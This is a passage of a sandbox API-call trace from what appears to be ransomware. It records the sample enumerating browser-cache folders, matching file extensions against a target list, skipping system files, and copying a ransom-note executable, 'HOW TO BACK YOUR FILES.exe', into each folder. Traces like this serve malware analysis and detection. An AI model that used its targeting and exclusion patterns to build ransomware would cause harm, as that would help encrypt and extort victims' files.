lpString2="sqlitedb") returned -1 [0041.446] lstrlenW (lpString="xml") returned 3 [0041.446] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0041.446] lstrlenW (lpString="$er") returned 3 [0041.446] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0041.446] lstrlenW (lpString="4dd") returned 3 [0041.446] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0041.446] lstrlenW (lpString="4dl") returned 3 [0041.446] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0041.446] lstrlenW (lpString="^^^") returned 3 [0041.446] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0041.446] lstrlenW (lpString="abs") returned 3 [0041.446] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0041.446] lstrlenW (lpString="abx") returned 3 [0041.446] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0041.446] lstrlenW (lpString="accdb") returned 5 [0041.446] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0041.446] lstrlenW (lpString="accdc") returned 5 [0041.446] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0041.446] lstrlenW (lpString="accde") returned 5 [0041.446] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0041.446] lstrlenW (lpString="accdr") returned 5 [0041.446] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0041.446] lstrlenW (lpString="accdt") returned 5 [0041.446] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0041.446] lstrlenW (lpString="accdw") returned 5 [0041.446] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0041.446] lstrlenW (lpString="accft") returned 5 [0041.446] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0041.446] lstrlenW (lpString="adb") returned 3 [0041.446] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0041.446] lstrlenW (lpString="adb") returned 3 [0041.446] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0041.446] lstrlenW (lpString="ade") returned 3 [0041.446] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0041.447] lstrlenW (lpString="adf") returned 3 [0041.447] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0041.447] lstrlenW (lpString="adn") returned 3 [0041.447] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0041.447] lstrlenW (lpString="adp") returned 3 [0041.447] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0041.447] lstrlenW (lpString="alf") returned 3 [0041.447] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0041.447] lstrlenW (lpString="ask") returned 3 [0041.447] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0041.447] lstrlenW (lpString="btr") returned 3 [0041.447] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0041.447] lstrlenW (lpString="cat") returned 3 [0041.447] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0041.447] lstrlenW (lpString="cdb") returned 3 [0041.447] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0041.447] lstrlenW (lpString="ckp") returned 3 [0041.447] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0041.447] lstrlenW (lpString="cma") returned 3 [0041.447] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0041.447] lstrlenW (lpString="cpd") returned 3 [0041.447] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0041.447] lstrlenW (lpString="dacpac") returned 6 [0041.447] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0041.447] lstrlenW (lpString="dad") returned 3 [0041.447] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0041.447] lstrlenW (lpString="dadiagrams") returned 10 [0041.447] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0041.447] lstrlenW (lpString="daschema") returned 8 [0041.447] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0041.447] lstrlenW (lpString="db-journal") returned 10 [0041.447] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0041.447] lstrlenW (lpString="db-shm") returned 6 [0041.447] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0041.447] lstrlenW (lpString="db-wal") returned 6 [0041.448] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0041.448] lstrlenW (lpString="dbc") returned 3 [0041.448] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0041.448] lstrlenW (lpString="dbs") returned 3 [0041.448] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0041.448] lstrlenW (lpString="dbt") returned 3 [0041.448] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0041.448] lstrlenW (lpString="dbv") returned 3 [0041.448] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0041.448] lstrlenW (lpString="dbx") returned 3 [0041.448] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0041.448] lstrlenW (lpString="dcb") returned 3 [0041.448] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0041.448] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0041.448] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a4bc500, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a4bc500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0041.448] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0041.448] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e3cd240, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0041.448] lstrcmpiW (lpString1="index.dat", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.448] lstrcmpiW (lpString1="index.dat", lpString2="aoldtz.exe") returned 1 [0041.448] lstrcmpiW (lpString1="index.dat", lpString2=".") returned 1 [0041.448] lstrcmpiW (lpString1="index.dat", lpString2="..") returned 1 [0041.448] lstrcmpiW (lpString1="index.dat", lpString2="windows") returned -1 [0041.448] lstrcmpiW (lpString1="index.dat", lpString2="bootmgr") returned 1 [0041.448] lstrcmpiW (lpString1="index.dat", lpString2="temp") returned -1 [0041.448] lstrcmpiW (lpString1="index.dat", lpString2="pagefile.sys") returned -1 [0041.448] lstrcmpiW (lpString1="index.dat", lpString2="boot") returned 1 [0041.449] lstrcmpiW (lpString1="index.dat", lpString2="ids.txt") returned 1 [0041.449] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat") returned -1 [0041.449] lstrcmpiW (lpString1="index.dat", lpString2="perflogs") returned -1 [0041.449] lstrcmpiW (lpString1="index.dat", lpString2="MSBuild") returned -1 [0041.449] lstrlenW (lpString="index.dat") returned 9 [0041.449] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\desktop.ini") returned 85 [0041.449] lstrcpyW (in: lpString1=0x2e2e8f4, lpString2="index.dat" | out: lpString1="index.dat") returned="index.dat" [0041.449] lstrlenW (lpString="index.dat") returned 9 [0041.449] lstrlenW (lpString="Ares865") returned 7 [0041.449] lstrcmpiW (lpString1="dex.dat", lpString2="Ares865") returned 1 [0041.449] lstrlenW (lpString=".dll") returned 4 [0041.449] lstrcmpiW (lpString1="index.dat", lpString2=".dll") returned 1 [0041.449] lstrlenW (lpString=".lnk") returned 4 [0041.449] lstrcmpiW (lpString1="index.dat", lpString2=".lnk") returned 1 [0041.449] lstrlenW (lpString=".ini") returned 4 [0041.449] lstrcmpiW (lpString1="index.dat", lpString2=".ini") returned 1 [0041.449] lstrlenW (lpString=".sys") returned 4 [0041.449] lstrcmpiW (lpString1="index.dat", lpString2=".sys") returned 1 [0041.449] lstrlenW (lpString="index.dat") returned 9 [0041.449] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e5e3095, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0041.449] lstrcmpiW (lpString1="MM5O9XQS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.449] lstrcmpiW (lpString1="MM5O9XQS", lpString2="aoldtz.exe") returned 1 [0041.449] lstrcmpiW (lpString1="MM5O9XQS", lpString2=".") returned 1 [0041.449] lstrcmpiW (lpString1="MM5O9XQS", lpString2="..") returned 1 [0041.449] lstrcmpiW (lpString1="MM5O9XQS", lpString2="windows") returned -1 [0041.449] lstrcmpiW (lpString1="MM5O9XQS", lpString2="bootmgr") returned 1 [0041.449] lstrcmpiW (lpString1="MM5O9XQS", lpString2="temp") returned -1 [0041.449] lstrcmpiW (lpString1="MM5O9XQS", lpString2="pagefile.sys") returned -1 [0041.449] lstrcmpiW (lpString1="MM5O9XQS", lpString2="boot") returned 1 [0041.449] lstrcmpiW (lpString1="MM5O9XQS", lpString2="ids.txt") returned 1 [0041.449] lstrcmpiW (lpString1="MM5O9XQS", lpString2="ntuser.dat") returned -1 [0041.449] lstrcmpiW (lpString1="MM5O9XQS", lpString2="perflogs") returned -1 [0041.450] lstrcmpiW (lpString1="MM5O9XQS", lpString2="MSBuild") returned -1 [0041.450] lstrlenW (lpString="MM5O9XQS") returned 8 [0041.450] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat") returned 83 [0041.450] lstrcpyW (in: lpString1=0x2e2e8f4, lpString2="MM5O9XQS" | out: lpString1="MM5O9XQS") returned="MM5O9XQS" [0041.450] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0041.450] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2cb388 [0041.450] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23a8 | out: ListHead=0x2e77d0, ListEntry=0x2d23a8) returned 0x2d2388 [0041.450] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e5e3095, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PMMR5K9K", cAlternateFileName="")) returned 1 [0041.450] lstrcmpiW (lpString1="PMMR5K9K", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.450] lstrcmpiW (lpString1="PMMR5K9K", lpString2="aoldtz.exe") returned 1 [0041.450] lstrcmpiW (lpString1="PMMR5K9K", lpString2=".") returned 1 [0041.450] lstrcmpiW (lpString1="PMMR5K9K", lpString2="..") returned 1 [0041.450] lstrcmpiW (lpString1="PMMR5K9K", lpString2="windows") returned -1 [0041.450] lstrcmpiW (lpString1="PMMR5K9K", lpString2="bootmgr") returned 1 [0041.450] lstrcmpiW (lpString1="PMMR5K9K", lpString2="temp") returned -1 [0041.450] lstrcmpiW (lpString1="PMMR5K9K", lpString2="pagefile.sys") returned 1 [0041.450] lstrcmpiW (lpString1="PMMR5K9K", lpString2="boot") returned 1 [0041.450] lstrcmpiW (lpString1="PMMR5K9K", lpString2="ids.txt") returned 1 [0041.450] lstrcmpiW (lpString1="PMMR5K9K", lpString2="ntuser.dat") returned 1 [0041.450] lstrcmpiW (lpString1="PMMR5K9K", lpString2="perflogs") returned 1 [0041.450] lstrcmpiW (lpString1="PMMR5K9K", lpString2="MSBuild") returned 1 [0041.450] lstrlenW (lpString="PMMR5K9K") returned 8 [0041.450] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned 82 [0041.450] lstrcpyW (in: lpString1=0x2e2e8f4, lpString2="PMMR5K9K" | out: lpString1="PMMR5K9K") returned="PMMR5K9K" [0041.450] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0041.450] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2cb438 [0041.450] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23c8 | out: ListHead=0x2e77d0, ListEntry=0x2d23c8) returned 0x2d23a8 [0041.450] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e5e3095, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RIJUQL1C", cAlternateFileName="")) returned 1 [0041.450] lstrcmpiW (lpString1="RIJUQL1C", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.450] lstrcmpiW (lpString1="RIJUQL1C", lpString2="aoldtz.exe") returned 1 [0041.450] lstrcmpiW (lpString1="RIJUQL1C", lpString2=".") returned 1 [0041.450] lstrcmpiW (lpString1="RIJUQL1C", lpString2="..") returned 1 [0041.450] lstrcmpiW (lpString1="RIJUQL1C", lpString2="windows") returned -1 [0041.450] lstrcmpiW (lpString1="RIJUQL1C", lpString2="bootmgr") returned 1 [0041.451] lstrcmpiW (lpString1="RIJUQL1C", lpString2="temp") returned -1 [0041.451] lstrcmpiW (lpString1="RIJUQL1C", lpString2="pagefile.sys") returned 1 [0041.451] lstrcmpiW (lpString1="RIJUQL1C", lpString2="boot") returned 1 [0041.451] lstrcmpiW (lpString1="RIJUQL1C", lpString2="ids.txt") returned 1 [0041.451] lstrcmpiW (lpString1="RIJUQL1C", lpString2="ntuser.dat") returned 1 [0041.451] lstrcmpiW (lpString1="RIJUQL1C", lpString2="perflogs") returned 1 [0041.451] lstrcmpiW (lpString1="RIJUQL1C", lpString2="MSBuild") returned 1 [0041.451] lstrlenW (lpString="RIJUQL1C") returned 8 [0041.451] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned 82 [0041.451] lstrcpyW (in: lpString1=0x2e2e8f4, lpString2="RIJUQL1C" | out: lpString1="RIJUQL1C") returned="RIJUQL1C" [0041.451] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23e0 [0041.451] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2cba28 [0041.451] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23e8 | out: ListHead=0x2e77d0, ListEntry=0x2d23e8) returned 0x2d23c8 [0041.451] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e5e3095, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X9OHK109", cAlternateFileName="")) returned 1 [0041.451] lstrcmpiW (lpString1="X9OHK109", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.451] lstrcmpiW (lpString1="X9OHK109", lpString2="aoldtz.exe") returned 1 [0041.451] lstrcmpiW (lpString1="X9OHK109", lpString2=".") returned 1 [0041.451] lstrcmpiW (lpString1="X9OHK109", lpString2="..") returned 1 [0041.451] lstrcmpiW (lpString1="X9OHK109", lpString2="windows") returned 1 [0041.451] lstrcmpiW (lpString1="X9OHK109", lpString2="bootmgr") returned 1 [0041.451] lstrcmpiW (lpString1="X9OHK109", lpString2="temp") returned 1 [0041.451] lstrcmpiW (lpString1="X9OHK109", lpString2="pagefile.sys") returned 1 [0041.451] lstrcmpiW (lpString1="X9OHK109", lpString2="boot") returned 1 [0041.451] lstrcmpiW (lpString1="X9OHK109", lpString2="ids.txt") returned 1 [0041.451] lstrcmpiW (lpString1="X9OHK109", lpString2="ntuser.dat") returned 1 [0041.451] lstrcmpiW (lpString1="X9OHK109", lpString2="perflogs") returned 1 [0041.451] lstrcmpiW (lpString1="X9OHK109", lpString2="MSBuild") returned 1 [0041.451] lstrlenW (lpString="X9OHK109") returned 8 [0041.451] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned 82 [0041.451] lstrcpyW (in: lpString1=0x2e2e8f4, lpString2="X9OHK109" | out: lpString1="X9OHK109") returned="X9OHK109" [0041.451] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0041.451] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2cbad8 [0041.451] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0041.451] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e5e3095, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X9OHK109", cAlternateFileName="")) returned 0 [0041.452] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0041.452] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2408 [0041.452] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0041.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbad8 | out: hHeap=0x2b0000) returned 1 [0041.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0041.452] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned 82 [0041.452] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0041.452] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.452] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.456] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.456] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4e2660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd028 [0041.457] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.457] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.457] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.457] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4e2660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.457] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.457] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0041.457] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.457] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.457] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e5e3095, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.457] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.457] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0041.457] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0041.457] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0041.457] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0041.457] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0041.457] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0041.457] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0041.457] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0041.457] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0041.457] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0041.457] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0041.457] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0041.457] lstrlenW (lpString="desktop.ini") returned 11 [0041.457] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*") returned 84 [0041.457] lstrcpyW (in: lpString1=0x2e2e906, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0041.457] lstrlenW (lpString="desktop.ini") returned 11 [0041.457] lstrlenW (lpString="Ares865") returned 7 [0041.457] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0041.457] lstrlenW (lpString=".dll") returned 4 [0041.457] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0041.458] lstrlenW (lpString=".lnk") returned 4 [0041.458] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0041.458] lstrlenW (lpString=".ini") returned 4 [0041.458] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0041.458] lstrlenW (lpString=".sys") returned 4 [0041.458] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0041.458] lstrlenW (lpString="desktop.ini") returned 11 [0041.458] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a4e2660, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0041.458] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0041.458] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a4e2660, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0041.458] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0041.458] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23e8 [0041.458] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0041.458] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0041.458] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0041.458] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned 82 [0041.458] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0041.458] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.458] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default 